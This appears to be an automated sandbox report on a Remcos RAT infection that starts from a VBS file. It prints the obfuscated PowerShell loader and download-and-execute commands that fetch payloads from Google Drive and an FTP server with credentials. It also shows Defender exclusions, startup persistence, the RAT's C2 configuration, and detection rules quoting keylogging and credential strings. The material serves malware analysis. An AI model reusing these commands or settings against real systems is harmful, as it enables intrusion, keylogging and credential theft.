[char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65 + 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' + [char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65 + 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 + 'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' + [char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65 + 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' + [char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + [char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY' + [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 + 'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65 + 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' + [char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65 + 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' + [char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65 + 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' + [char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv = $qKKzc.replace('???' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 4924 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3136 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 4232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 6444 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5424 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3796 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegAsm.exe (PID: 2820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • cmd.exe (PID: 3976 cmdline: cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 876 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2168 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cmd.exe (PID: 6276 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5412 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 6828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 5440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "212.162.149.163:2404:0", "Assigned name": "NedDay", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-52K54M", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\1210\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.powershell.exe.19971c2ad28.3.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              18.2.powershell.exe.19971c2ad28.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                18.2.powershell.exe.19971c2ad28.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  18.2.powershell.exe.19971c2ad28.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x690b8:$a1: Remcos restarted by watchdog!
                  • 0x69630:$a3: %02i:%02i:%02i:%03i
                  18.2.powershell.exe.19971c2ad28.3.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6317c:$str_b2: Executing file:
                  • 0x641fc:$str_b3: GetDirectListeningPort
                  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x63d28:$str_b7: \update.vbs
                  • 0x631a4:$str_b9: Downloaded file:
                  • 0x63190:$str_b10: Downloading file:
                  • 0x63234:$str_b12: Failed to upload file:
                  • 0x641c4:$str_b13: StartForward
                  • 0x641e4:$str_b14: StopForward
                  • 0x63c80:$str_b15: fso.DeleteFile "
                  • 0x63c14:$str_b16: On Error Resume Next
                  • 0x63cb0:$str_b17: fso.DeleteFolder "
                  • 0x63224:$str_b18: Uploaded file:
                  • 0x631e4:$str_b19: Unable to delete:
                  • 0x63c48:$str_b20: while fso.FileExists("
                  • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 43 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_6764.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 